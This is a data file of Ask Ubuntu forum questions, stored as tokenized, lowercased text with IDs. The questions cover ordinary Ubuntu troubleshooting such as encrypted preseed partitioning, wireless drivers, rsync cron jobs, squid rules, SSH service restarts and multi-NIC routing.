305176	preseed with lvm and crypto fails with `` an error occured while creating the keyfile . ''	i am trying to set up a preseed installation that will automate most of the installation of a desktop computer with ubuntu 13.04 . disk partitioning with lvm works fine , but i need to encrypt the drive . the documentation i read seems to indicate that simiply replacing d-i partman-auto/method string lvm with d-i partman-auto/method string crypto . but in this case , i get `` an error occured while creating the keyfile . '' during installation . i tried setting d-i partman-crypto/passphrase string xxx but it does not change anything . i would prefer not to have passphrase in preseed file anyway . error message is not very explicit ( at least for me ) and i cant seem to find the right documentation . i load my preseed by customizing the desktop iso with the following isolinux.cfg default desktop label desktop say booting a desktop install ... kernel /casper/vmlinuz.efi append file=/cdrom/preseed/desktop.seed boot=casper only-ubiquity initrd=/casper/initrd.lz quiet splash -- if i do the same but based on the `` server '' iso , using the isolinux.cfgbelow , the partioning works correctly , but tasksel tasksel/first multiselect ubuntu-desktop fails . default desktop label desktop say booting a desktop install ... kernel /install/vmlinuz append file=/cdrom/preseed/desktop.seed initrd=/install/initrd.gz ramdisk_size=16384 root=/dev/ram rw quiet -- relevant section of my preseed file below : # # # partitioning # # partitioning example d-i partman-auto/disk string /dev/sda d-i partman-auto/method string crypto d-i partman-lvm/device_remove_lvm boolean true d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-auto-lvm/guided_size string max # d-i partman-auto/choose_recipe select boot-root d-i partman-auto-lvm/new_vg_name string crypted d-i partman-crypto/passphrase string xxxx d-i partman-crypto/passphrase-again string xxxx d-i partman-auto/expert_recipe string \ boot-root : : \ 128 50 128 ext4 \ $ primary { } \ $ bootable { } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /boot } \ . \ 4000 50 10000 ext4 \ $ defaultignore { } \ $ lvmok { } \ lv_name { root } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { / } \ . \ 4096 50 4096 linux-swap \ $ defaultignore { } \ $ lvmok { } \ lv_name { swap } \ method { swap } format { } \ . \ 1000 50 1000000 ext4 \ $ defaultignore { } \ $ lvmok { } \ lv_name { home } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { /home } \ . # this makes partman automatically partition without confirmation , provided # that you told it what to do using one of the methods above . d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i partman/choose_partition select finish d-i partman/mount_style select label
305177	wireless driver interfering with other devices on my network ( not duplicate )	my girlfriends computer recently upgraded to 13.04 . i have another computer running fedora , several android devices , and my friend was over earlier with his mac . the computer running ubuntu 13.04 causes every other device to have ~30-40 % packet loss while pinging my router and 8.8.8.8 . as soon as i diconnect her computer from the network all of the other devices begin functioning correctly ; actually it 's not immediate ; during tests the other devices report dropping the first one or two packets and then they start behaving correctly . this is mind-bonglingly repeatable . the computer that is causing the issue is an hp folio running ubuntu 13.04 . the wireless is broadcom controller and using the wl driver . $ lspci -vv -s subsystem : hewlett-packard company device 1795 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 18 region 0 : memory at c2600000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=2 pme- capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ d0 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 4us , l1 unlimited exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l1 , latency l0 < 4us , l1 < 64us clockpm+ surprise- llactrep+ bwnot- lnkctl : aspm l1 enabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive+ bwmgmt- abwmgmt- capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 14 , gencap+ cgenen- chkcap+ chken- capabilities : [ 13c v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 00-00-d3-ff-ff-08-7c-e9 capabilities : [ 16c v1 ] power budgeting < ? > kernel driver in use : wl and here is some more info about the driver : $ modinfo wl filename : /lib/modules/3.8.0-23-generic/updates/dkms/wl.ko license : mixed/proprietary srcversion : 6e2531203cf49eb24353067 alias : pci : v*d*sv*sd*bc02sc80i* depends : cfg80211 , lib80211 vermagic : 3.8.0-23-generic smp mod_unload modversions parm : oneonly : int parm : piomode : int parm : instance_base : int parm : nompc : int parm : intf_name : string i found a similar issue on askubuntu.com it seems to be the exact same problem , but the solution , to remove the driver , would be unexeptable without a replacement driver and i really do n't feel like rolling my own driver . can anybody help me troubleshoot ( and hopefully ) fix this problem ?
305179	apt-get update error using automatic proxy configuration	i am using ubuntu 10.4.04 lts with in vmware5 . i used automatic proxy configuration and i 'm able to use internet from firefox . when i wanted to update apt-get update , i am getting following errors . the following link gives some solution , but i do n't have any port number as i 'm using automatic proxy https : //answers.launchpad.net/uck/+question/108860 . error : ign http security.ubuntu.com lucid-security multiverse packages ign http security.ubuntu.com lucid-security multiverse sources ign http security.ubuntu.com lucid-security main packages err http security.ubuntu.com lucid-security main packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http security.ubuntu.com lucid-security/restricted packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http security.ubuntu.com lucid-security/main sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http security.ubuntu.com lucid-security/restricted sources something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http security.ubuntu.com lucid-security/universe packages something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http security.ubuntu.com/ubuntu/dists/lucid-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http security.ubuntu.com/ubuntu/dists/lucid-security/main/i18n/translation-en_us.bz2 something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http security.ubuntu.com/ubuntu/dists/lucid-security/restricted/i18n/translation-en_us.bz2 something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) thank you for your response !
305183	ubuntu touch install from recovery on nexus 7 3g	i would like to install the ubuntu touch on my nexus 7 3g . i have twrp recovery but the installation was failed . here 's the log : installing '/sdcard/download/raring-preinstalled-armel+grouper.zip ' ... checking for md5 file ... i : can not find file /sdcard/download/raring-preinstalled-armel+grouper.zip.md5 skipping md5 check : no md5 file found . script aborted : assert failed : getprop ( `` ro.product.device '' ) == `` grouper '' || getprop ( `` ro.build.product '' ) == `` grouper '' assert failed : getprop ( `` ro.product.device '' ) == `` grouper '' || getprop ( `` ro.build.product '' ) == `` grouper '' e : error executing updater binary in zip '/sdcard/download/raring-preinstalled-armel+grouper.zip' error flashing zip '/sdcard/download/raring-preinstalled-armel+grouper.zip' what 's wrong ?
305188	installing matlab 2012b on ubuntu 12.10-java error	i have matlab 2012b iso file and i tried mounting it and install ..but i get the following error ... root @ karthik : /home/karthik # mount -t iso9660 -o loop /home/karthik/downloads/matlab.iso /media/mathworks mount : warning : /media/mathworks seems to be mounted read-only . root @ karthik : /home/karthik # cd /media/mathworks root @ karthik : /media/mathworks # ./install -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error : can not locate java runtime environment ( jre ) . the directory /media/mathworks/sys/java/jre/glnx86/jre does not exist . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - what could be the problem ? ?
305192	“qml2puppet” windows appearing in qt creator	using qt creator 2.7.0 , when i switch to design view of a qml file , i 'm now getting 3 additional , unresponsive windows opening up , all with the title “qml2puppet” . this did n't used to happen . i 've un-installed and re-installed qt creator ( using sudo apt-get purge qtcreator and sudo apt-get install qtcreator ) , but this has n't solved it . i 've also deleted the qtproject.conf , trolltech.conf and qtproject items in ~/.config . any ideas for what else to try ? i 'm using kubuntu 13.04 , 64 bit . note : this is a different issue to multiple windows at qtcreator startup ( where the windows are untitled and appear at startup ) .
305194	what 's the best version of ubuntu for a dell inspiron 1150	i 've attempted to install 12.10 , but i can get a proper unity desktop or launch button etc . i 've tried various recommended fixes but no success , so i updated to 13.04 in the hope that it might fix any known bugs - no success . i 'm stumped . i do n't the expertise ( or the time ) to work through this diagnostically - i just want a fix . should i settle for an earlier version - if so , which ?
305197	why is the intel turbo boost mode not running at maximum speed ?	i tested cpu frequencies with either the intel tool i7z and turbostat from the linux-tools package ( sudo modprobe msr , sudo turbostat ) and what i find as maximum frequencies for two different processors is lower as what intel states as maximum turbo frequency . i tested with mrbayes mpi on 4 cores with governors ondemand and performance and the 'turbo ' option using indicator-cpufreq . i5-3210m - intel specifications max . freq . : 2,5ghz - 3,1ghz turbo max . measured : 2,89ghz i5-3470 - intel specifications : 3,2ghz - 3,6ghz turbo max . measured:3,39ghz i also tried for i in { 1..4 } ; do burnk7 & done in tty1 and turbostat in tty2 and got the same results . why are the max . turbo cpu frequency i can measure running ubuntu lower than the ones intel states ? where are the `` missing '' 0,21ghz ?
305199	is there a deb package to install firefox esr ?	i would like to have firefox esr version on my system but i would like to install it via apt-get . is there a special package to install this ? download link would be : http : //www.mozilla.org/firefox/organizations/all.html # en-us
305202	how to open encfs folders in 13.04 now that cryptkeeper no longer works	i 've encrypted a folder using cryptkeeper to store important stuff . after installing 13.04 cryptkeeper no longer works . how can i open my encrypted folder ? i have tried gnome encfs , but i ca n't seem to open the existing folder .
305207	`` the package system is broken '' unsolvable : ( ?	i was trying to install a version of ares in my new ubuntu 12.04 and i got an error during the installation . after that i 've been unable to install any other program as the synaptic or any other . the following message is shown : the following packages have unmet dependencies : xorg : depends : xserver-xorg-renamed but it is a virtual package depends : libgl1-mesa-dri but it is not installed i 've tried all upgrade , update , install -f and configure -- a codes i 've seen in the forums and i still can not fix this problem . i never thought ubuntu could be such a headache . please i 'm begging for help !
305214	how can i remove this file ?	i 'm using an apple timecapsule mounted via gvfs-mount ( i tried cifs too ) which contains a file named capitoli 3:5.odt i definitely want to remove that but i had no luck . from ubuntu the most i can get is `` file o directory non esistente '' ( which is italian for `` no such file or directory '' , i suppose ) from windows it does n't let me manage this file because : ( colon ) is forbidden i tried removing that file using the inode , but still no luck . i 'm mounting the share using these options sec=ntlm , serverino , nodfs this is what i get : # ls -l totale 16 -rwxr-xr-x 0 root root 15296 ago 19 2008 capitoli 3:5.odt # rm -f capitoli\ 3\:5.odt # ls -l totale 16 -rwxr-xr-x 0 root root 15296 ago 19 2008 capitoli 3:5.odt with the -f option rm behaves as if the file was effectively removed , which is not the case . without that option it says # rm capitoli\ 3\:5.odt rm : impossibile rimuovere `` capitoli 3:5.odt '' : file o directory non esistente which means like `` no such file or directory '' . any advice on how to remove this haunting presence in my device ? this is the content of /proc/fs/cifs/debugdata that i think could be useful : display internal cifs data structures for debugging -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - cifs version 2.0 features : dfs fscache lanman posix spnego xattr acl active vfs requests : 0 servers : 1 ) name : 192.168.1.1 domain : workgroup uses : 1 os : apple base station nos : cifs 4.32 capability : 0x207c smb session status : 1 tcp status : 1 local users to server : 1 secmode : 0x3 req on wire : 0 shares : 1 ) \\192.168.1.1\disco mounts : 1 type : fat32 devinfo : 0x0 attributes : 0x3 pathcomponentmax : 255 status : 0x1 type : 0 mids :
305215	yesterday my system was working fine . but today my system is not getting shut down	yesterday my system was working fine . but today my system is not getting shut down . when i give shut down it is giving the error message that 'speed dispatcher stopped ' . i am not sure that because of this my system is getting hang when i try to shut down . please any one can help.. thanks in advance .
305216	ubuntu server 12.04 remote desktop access	i have an ubuntu 12.04 server at home with gui running . it does many things , like apache virtual hosts ( several wordpress sites hosted for me and my mates ) , samba server , mini dlna server and some other stuff . it 's great , we think it 's the ants pants in our house , it serves media all round the house flawlessly ( much more useful and better than our old rig which ran windows 7 ) . i use webmin to manage just about everything on it . big up to webmin , it 's great , but it has limitations ( for me and my limited skills ) . here 's the thing . when i am away from home ( a lot ) , i want to be be able to drive the ubuntu server desktop ( is that an oxymoron ? maybe i mean ubuntu server gui ) remotely ( i know i should learn command prompt via ssh , but i am stupid and do n't have time . ; ) last time i opened the port ( 22 ) to ssh , i read the logs and was getting hammered by hacking attempts . so i closed the port on the router . our internet connection at home is cable and super fast . when i am away from home i use a 3g connection on an ipad retina and a laptop running windows . way too slow to get torrents ( not to mention expensive for data ) . so , my question is `` how do i connect to my server remotely with vnc client or something like that and operate it like i am sitting in front of it with the gui ? '' webmin is good , but i want to use a browser on the server remotely and start torrents . so when i get home , everything is done and waiting for me to watch on my dlna enabled devices at home .
305222	touchpad does not work on acer aspire v5-121 , on	i recently installed ubuntu 13.04 on my new acer aspire v5-121 netbook . the first thing i noticed was that the touchpad does not work . it does not recognize clicks or touches . how do i find out what 's wrong , and fix it ? i did not find any proprietary drivers for the touchpad offered by ubuntu . the package xserver-xorg-input-synaptics is already installed . xinput list shows the following : $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ pixart microsoft usb optical mouse id=10 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ hd webcam id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=14 [ slave keyboard ( 3 ) ] i 've already tried the solutions outlined here , for a somewhat similiar issue : touchpad stopped working on an acer aspireone d255e . but the solutions outlined here did not help . edit : i found a solution . apparently it was just disabled by the system . even though i 'd turned off the option to disable touchpad when mouse is plugged in , it was disabled for some reason . solution : press ctrl-fn-f7 .
305224	grub menu does n't appear on hp z220 workstation	i bought an analytical machine for some research purpose , the company provided an hp z220 workstation with windows 7 professional preinstalled . i have tried to install ubuntu 12.04 on this computer . my problem is that no grub menu appeared after the successful installation of ubuntu . the machine is booting directly to windows without showing any grub menu or anything on the screen . i have tried : reinstallation of ubuntu installation and updating of grub using a live cd mounting and unmounting of all partitions using a live cd checked all options of grub file using a live cd nothing worked . can anyone tell me what could have gone wrong ?
305225	how to clean gedit 's and other editor 's find & replace history ?	i have started working on a new project using gedit on ubuntu 12.04 . the problem i am facing now is that , all previously searched terms are still there when i click on the drop down arrow in search box of find & replace menu and i have to select from a long list of search terms . how can i clean those histories of find & replace ?
305226	will my original os be deleted when i try ubuntu ?	i currently use windows 7 home premium . i want to try ubuntu without changing my original os windows 7 . when i get accustomed to ubuntu , then i am gon na migrate to ubuntu . in the mean time , while booting from ubuntu live cd , will my original os be deleted ?
305229	what 's the best way to ssh to machines on the local network ?	i have 2 computers , one that i use and one for the kids . i want to be able to ssh into their computer to control it ( like to shut it down etc ) but am curious the best way to do this . we both are in the same house and share the same internet connection . what would be the best way to do this ? from research , i read to install openssh-server on the remote computer but am stumped what to use for the hostname when trying to connect . usually for vps 's it 's the external ip but since we both share a wifi connection would it be the hardware ip ? should we be interfacing directly by lan or by going through the internet ?
305234	automatic lock screen issue	my ubuntu 13.04 does automatic lock screen after x minutes , but the screen is still showing any opened windows . only after we tried to click or type anything , ubuntu will prompt password to unlock . how we completely hide any windows open once the auto lock working .
305238	does process priority have defined classes.. ?	i am searching for an document or related to processes priority levels . in linux , related documentation does not talk about priority levels or priority classes . it only provides the range of nice values . user can set any value within that range . kernel provides min and max limits for priority . currently “gnome system monitor” shows process priority names like “ very high , high , normal , low , very low ” and each one has own nice value range . i have n't found any documentation related to these names as such . in 2004 , a bug was raised in “gnome.org” against “gnome system monitor” bug 131802 . the bug describes that “gnome system monitor” should not make references to `` nice . '' nice has confusing semantics , mostly due to lower values being higher priority . in 2011 , a the patch adds a priority column in the process table to show the nice value in a human-understandable way , and show it by default . i refered the https : //bug131802.bugzilla-attachments.gnome.org/attachment.cgi ? id=202180 and referd function “get_nice_level ( ) ” in the source code for “gnome-system-monitor” . below is the function template from the same file . static gchar * get_nice_level ( gint nice ) { if ( nice < -7 ) return _ ( `` ( very high priority ) '' ) ; else if ( nice < -2 ) return _ ( `` ( high priority ) '' ) ; else if ( nice < 3 ) return _ ( `` ( normal priority ) '' ) ; else if ( nice < 7 ) return _ ( `` ( low priority ) '' ) ; else return _ ( `` ( very low priority ) '' ) ; } these are my questions : the values defined by / for gnome system monitor , they are that tool specific ? is gnome system monitor is actually putting a process to that priority ? is kernel also treat that process in that priority which is changed in gnome system monitor ? is there any where i can find that these are the newly defined priority classes for different priority levels ? is this classes used across all the distributions. ? thanks . shri hari .
305244	is this normal cpu/memory usage for a system that runs nothing but ubuntu as they start up ?	is this the expected cpu/memory usage for a pure 13.04 64bit system ? i run nothing more than ubuntu as they are at the moment of the screenshot . ps faux output : pastebin
305247	why does steam cost $ 0.00 ?	when i try to buy it , the software centre just redirects me to the `` ubuntu software centre terms of service '' . what should i do ? os : xubuntu 12.04 lts ( tr language and time zone )
305255	update manager is n't showing upgrade option	i am trying to upgrade from 12.10 to 13.04 . in in instructions it lists that i need update manager but when i searched my system there was no such application ... please tell me where i can get update manager ... thanks for your help ...
305264	software updater not working : showing configuring binfmt-support	i discover on clicking the software updater application , the scrolling bar hangs with this message beneath it ; '' configuring binfmt-support '' also , using `` **sudo apt-get update** '' runs for a while then brings our the error ; '' **e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . ** '' and on running `` **sudo dpkg -- configure -a** '' it shows '' setting up binfmt-support ( 2.0.13 ) ... '' and hangs also !
305270	is it needed to upgrade perl to new stable version in ubuntu 12.04 lts	as above ! thanks ! can you suggest a book for this question ?
305271	what is wrong with my rsync backup sh script ?	the following is a shell script ( backup.sh ) rsync -abr -- files-from='backup.txt ' -- delete -- stats -- progress -- exclude= { /home/rob } -- log-file=/var/log/backup.log /home/ root @ remote : /home/ i created the above as root . the backup.txt is 4 lines of simple path ( /home/linda/ etc.. ) i edited crontab to run monday through friday beginning at a certain time . i can run the script manually and it works fine . when i leave it to run on it 's own and i come back and look at the log , it shows 2 errors : rsync : failed to open files-from file backup.txt : no such file or directory rsync error : syntax or usage error ( code 1 ) at main.c ( 1453 ) [ client=3.0.9 ] what am i doing wrong or forgetting ?
305277	allowing a particular user to access a blocked site for a limited time	i have configured squid proxy server and blocked facebook site . i need to give permission for a particular user to access facebook for a limited time . for that how to modify the configuration file . this the screen shot of the configuration file . screen shot ( the font size is small , so please zoom the image ) in this line , http_access deny facebook all ! allowip118 ! allowip113 ! allowip108 ! allowip18 what is configured here ? . facebook is denied but what ! allowip113 indicates ?
305282	running a email server using iredmail : why is cluebringer/policyd using nearly 100 % cpu ?	i 'm setting up my own email server in hopes to move away from gmail , i hate the idea of someone at google having the ability to look through all my emails . i setup everything using iredmail on my netbook running ubuntu 13.04 and it seems to be working fine however one thing iredmail installed was cluebringer/policyd ( http : //www.policyd.org/ ) . from what i read it appears to be a blacklist/whitelist for emails you can setup , this seems cool and i will figure it out more later from the site 's documentation . in the meantime it 's sucking all my cpu power near 100 % all the time . i have no idea why , does anyone have an idea of why it 's doing this and how to fix it ? tl ; dr : the title sums it all up ! : )
305286	hardware problems sabotage booting	this is not a special ubuntu-question , but the problem occurred with ubuntu 12.04 , so i 'm gon na post it in here . and as a lot of you are fiddling around with different sets of hard- and software , some of you might have a clue what 's going on here . i set up a new computer system ( for details see below ) . i got a new motherboard , cpu , ram and hdd , which are all recognized by the bios . post does n't give me any fancy beep-codes , so i think it all should work . i just installed my ubuntu 12.04 on the hdd . the installation worked without any errors . than i wanted to boot the new os from the hdd . it went straight to the boot-screen showing `` ubuntu '' and the tiny dots that blink from orange to white and back . that is where it got stuck ! my mouse can still be moved , but at some point the startup does n't get any further . the dots stop blinking and stay orange , nothing happens for a while , than the screen thinks `` oh , time to save energy '' and turns off to black because he does n't get anything new ... now i took the hdd with the os and put it into a computer that i 've been working with for quite a while . it instantly started and as fast as lightning went to the desktop . `` yap , master . here i am ! what 's it you want ? '' just grabbed the hdd with the os i used to work with in that computer ( os definitely works , did so for the last few years ! ) and took it to the new combined computer . this os is a windows xp , and i have used a programm that changes the bootscreen to some fancier ones that are switched when he 's ready loading my account . when i started the new computer with my winxp , he went to the standard-bootscreen of windows xp , which is very weird , 'cause he should go to my customized ones . after all , it 's just a short fade in , no colored bars running left- > right or anything standard . than he instantly goes black again and to the well-known black screen with white letters : `` did n't start blabla last working configuration ? blabla keep configuration ? blabla '' so , to make a long story short , it does n't depend on the software i take , it is a hardware problem , but i do n't know where . my components of the new computer are : - asrock b75 pro3-m - i3-3220 - western digital caviar green 500gb sata 6gb/s intellipower 64mb - g.skill ddr3 ram ( 2x1gb ) if you have any questions left i did n't answer in this text , please feel free to leave a comment . i 've been struggling with this new system for about 1.5 months now , and i can not find a way out of this . thanks for the help you will provide ! edit ( 06-10-2013 ) : just tried the memtest86+ v4.20 on the ubuntu-cd to test my system , if there is any other error i might not have found . now i get lots of errors in the memtest . i 'm at test # 8 right now , and the number of errors is at 121088 so far . not sure how much still ahead ... : / does this information help ? edit 2 : just recognized that every time i install the ubuntu on the computer ( just tried a re-installation to fix it ... ) the user-interface of the preview-mode of ubuntu has lots of graphical errors . black and white smear-things all over the windows . when i drag the window out of screen and pull it in again , sometimes it 's better . but sometimes it gets worse ! most interesting : the wallpaper is not involved , it 's bright and shiny as ever before ! could the problem be with the cpu , that , according to the description , should do some graphics at the same time ? not sure , but with the memtest throwing loads of errors on the cpu and the graphics not working , it might be a possibility ... ! suggestions ? edit 3 : so , the windows xp installation cd i 've got here does n't even try to install anything , it says it found some error and does n't do anything further . concerning the smeary graphic bugs mentioned above : just went into the trial mode of ubuntu from cd , and everything is fine , no problems with that ! but the ubuntu trialversion bothers me with a lot of `` internal error '' -messages and the question if he should send a message to the support or not . for every single error that occured ! is there anybody out there to help me ? you could make my day ( s ) if you help me fix this nasty problem i 'm struggling with for some months now ! thanks .
305289	resizing the unity side bar on ubuntu 12.04 lts	how can we resize the unity side bar on ubuntu 12.04 lts ? i would like to make it as small as possible .
305291	add `` application menu '' to dock ?	i currently have a love/hate thing going on with ubuntu - i like the fact is has a strong userbase , good support and looks polished , but am frustrated by a handful of user interface issues i wish i could change ... i would like the option of having an `` application menu '' available in the dock . similar to other distributions ( or the windows start menu ) which show all the applications currently installed with a single click . i know you can find this information using the dock . but i would like a button specifically to do this which could be added , for example , right underneath the dock button . does such a thing exist ?
305293	why cant i find site_perl directory in ubuntu ?	i am compiling a program from source code . it requires path to my site_perl directory . when i run perl -v , i see that there is /usr/local/lib/site_perl at the end but i cant find the directory in the path . so , i am confused what path to provide for site_perl . can anyone help me or direct me to related reading ? $ perl -v ... ... ... .. @ inc : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl thanks ! !
305297	how to add callouts to an image using a software installed by default in ubuntu ?	what 's the easiest way to add callouts to an image given the capabilities of a default ubuntu 12.04 ? i 've got gimp 2.6 already present ( although i am not suggesting it is present in a default ubuntu ) and i find the instructions for adding a callout via gimp to be tedious . there is something called gimp dynamic text plugin but i 've read that it 's very old and so unlikely to work in 2.6 and you probably have to compile c files to get it to work ; so it could be messy and still may be a bad cost-benefit prospect . if the answer does not involve gimp , that would be welcome .
305299	ubuntu 12.04 - i can ssh into the server but sshd is an unrecognized service	i 'm trying to setup key based authentication for ssh on my ubuntu 12.04 server following this tutorial and that . it 's not really working but i have another problem slowing me down , which is that i ca n't restart the ssh service . i can ssh to the server without any trouble . if i do ps aux | grep -i `` ssh '' i can see the sshd process but if i do service sshd restart then i get `` sshd unrecognized service '' . i can restart ssh but i take it that 's a client , not a server . if i google `` sshd unrecognized service '' i get to know all about troubleshooting ssh connectivity but that 's not my problem . i tried purging and reinstalling openssh-server , to no effect . how can i restart the sshd service if that service does n't exist ?
305304	download 13.04 iso with wget	i am trying to build a virtual machine running ubuntu 13.04 on a server running 12.04 . i do n't have any gui . how can i download the iso file to 12.04 server using wget ? i want to download the 13.04 server edition 64-bit .
305305	running xbmc on bumblebee-nvidia	i have xps 15z with nvidia gt 525m and intel graphics cards running using optimus technology . currently , when i start xbmc it runs using the `` intel '' driver . and it runs totally fine but i would like to know if there is a difference when running xbmc on intel or nvidia ? if yes , how can i run xbmc on nvidia ? ! i tried `` optirun xbmc '' but it became sluggish and unusable .
305313	system time keeps resetting to utc	edit by op : yes , the community is correct . the question indeed is a duplicate of this one . i missed it in my search . thank you for pointing me there . i 've been noticing a peculiar issue with ubuntu recently , in that booting to ubuntu from windows seems to be messing with the system time . eg : i shutdown windows at 8:35pm , to boot into ubuntu . when ubuntu was started up , instead of showing time as 8:35 pm , it showed 3:05 pm momentarily , before setting itself to 8:35pm . if windows is restarted after this happens , time now becomes 3:05pm ( which seems to be utc time ) if windows alone is restarted ( meaning booting up windows after shutting down windows ) , no time fluctuation occurs . if ubuntu is started up after windows is shutdown , the same issue happens . time seems momentarily utc , and then corrected within a second or so after startup , to correct time . however the next time windows is booted up , the time becomes the same as that which was momentarily displayed on ubuntu . i hope i 'm making this clear . i 've checked that my timezone is correct in ubuntu . it is set as asia/kolkata . i even did a dpkg-reconfigure tzdata , but it was already correct timezone . my timezone is asia/kolkata , which is utc+5.30 hours . the time which appears incorrectly is the correct time if my timezone was utc . i have a multiboot with grub2 , managing ubuntu 13.04 and windows 8 . pc is an acer aspire v5-121 netbook purchased two days ago . i 'd love any help with deciphering this apparently weird mystery .
305314	nautilus : remember previous session state , auto-restore on startup ?	anyone know today of a way to make nautilus auto restore the previous session state : dual pane or single , tabs , displayed directories , etc. ? closest i can find is question 52112 , but not only is it two years old and with no good answer , offerings broaden to general session saving : not specific to nautilus and also a fail . short of joining the project and writing code , is there a solution currently available ?
305316	how to monitor a local file for changes , apply a regex replace on it and save/overwrite to a destination file ?	i 'd like to start a script or something that watches a text file for changes . when the file changes i want to run it through a regex parser to replace some text and then output the modified file to a destination file . i 'm pretty new to linux so bear with me but this would be cool to get sorted so thanks for your help in advance ...
305320	ubuntu routing table with 3 nics	i want to configure ubuntu 12.04 as a router . this ubuntu pc has 3 network cards eth0:192.168.1.203 ( lan1 ) eth1:172.16.30.21 ( internet ) eth2:10.216.1.107 ( lan2 ) and $ route -n kernel ip routing table destination gateway genmask indic metric ref use iface 0.0.0.0 172.16.30.1 0.0.0.0 ug 0 0 0 eth1 10.216.1.0 10.216.1.1 255.255.255.0 ug 0 0 0 eth2 10.216.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth2 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth2 172.16.30.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1 192.168.0.0 192.168.1.3 255.255.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 if i configure another windows pc ( pc1 ) like this : ip:192.168.1.29 mask:255.255.255.0 gw:192.168.1.203 from this pc ( pc1 ) , i am connected to the internet and i can ping all ips in this range 192.168.0.0/16 and this ip 10.216.1.107.but i can not ping the other ips in this range 10.216.1.0/24 ( i can ping this range from ubuntu pc ) . my problem is how to modify my route table to assure a connection between pc1 and all pcs in 10.216.1.0/24 range
